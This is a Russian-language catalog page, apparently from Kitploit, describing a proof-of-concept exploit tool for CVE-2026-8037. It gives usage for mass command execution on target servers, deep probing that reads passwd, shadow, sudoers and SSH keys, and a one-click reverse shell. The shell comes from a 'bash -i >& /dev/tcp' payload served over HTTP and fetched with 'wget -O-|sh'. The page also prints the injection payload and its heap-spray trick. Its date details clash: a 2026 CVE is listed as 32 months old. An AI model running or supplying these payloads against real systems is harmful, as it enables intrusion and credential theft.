Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-8037-POC — Включает обнаружение выполняемых команд и получение шелла в один клик (требуется развёртывание сервиса на сервере) | Kitploit
Инструменты/GitHubGitHub/caster-chen/cve-2026-8037-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

Включает обнаружение выполняемых команд и получение шелла в один клик (требуется развёртывание сервиса на сервере)

Репозиторий
32 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-8037-POC

Включает обнаружение выполняемых команд и однонажатие получения оболочки (требуется развертывание сервера) pco.yaml в сочетании с nuclei позволяет быстро обнаруживать

Быстрый старт

Интерактивный режим

root@kitploit:~
python go.py

Введите целевой URL → выберите пункт меню.

Обнаружение целей

root@kitploit:~
# 快速探测(8 项基本信息)
python go.py -t https://IP:PORT --probe fast

# 深度探测(全部命令:30+ 项)
python go.py -t https://IP:PORT --probe deep

# 批量探测
python go.py -f vulnerable_targets.txt --probe fast

Выполнение команд

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# 批量并发(20 线程)
python go.py -f targets.txt -c "hostname" --batch 20

Оболочка с обратным соединением в один клик

Откройте два терминала на атакующей машине:

root@kitploit:~
# 终端 1 - HTTP 服务(提供 rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# 终端 2 - 等待反弹
nc -lvnp 8088

Затем отправьте payload:

root@kitploit:~
# 单目标
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# 批量(串行,一次只能接一个)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

Скрипт выводит подготовительные шаги перед отправкой.


Содержимое глубокого обнаружения

КатегорияКоманда
Базовая информацияhostname, uname -a, kernel, OS release, uptime
Пользователиid, whoami, users/w/who
Сетьifconfig, route, arp, listening ports, connections, iptables
Системаprocesses, cpuinfo, meminfo, disk, mount
Файлыls / /root /tmp /home /etc
Конфигурацияcrontab, passwd, shadow, sudoers, SSH keys
Расширенияconfig search, scripts, docker, containers

Принцип внедрения

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...}
  • apiuser="''''" вызывает ошибку escape_quotes() с отсутствием нулевого завершения
  • g0~g60 куча-спрей 61 раз для повышения успешности
  • '; <команда> # закрывает контекст, # комментирует остальное

Ограничения по длине

Доступно 34 символа без использования echo tag:

root@kitploit:~
wget -O- IP:PORT|sh    (31 字符)

Цепочка: wget загрузка → sh выполнение → bash обратное соединение на указанный порт.


Параметры

ПараметрНазначение
-t, --target URLЦелевой адрес
-f, --file FILEФайл со списком целей
-l, --lhost IPIP атакующей машины
-p, --lport PORTПорт HTTP-сервера (по умолчанию 8087)
-n, --ncport PORTПорт прослушивания nc (по умолчанию 8088)
-c, --cmd CMDВыполнить команду
--probe fast/deepБыстрое/глубокое обнаружение
--batch NКоличество параллельных запросов (по умолчанию последовательно)
Скачать инструмент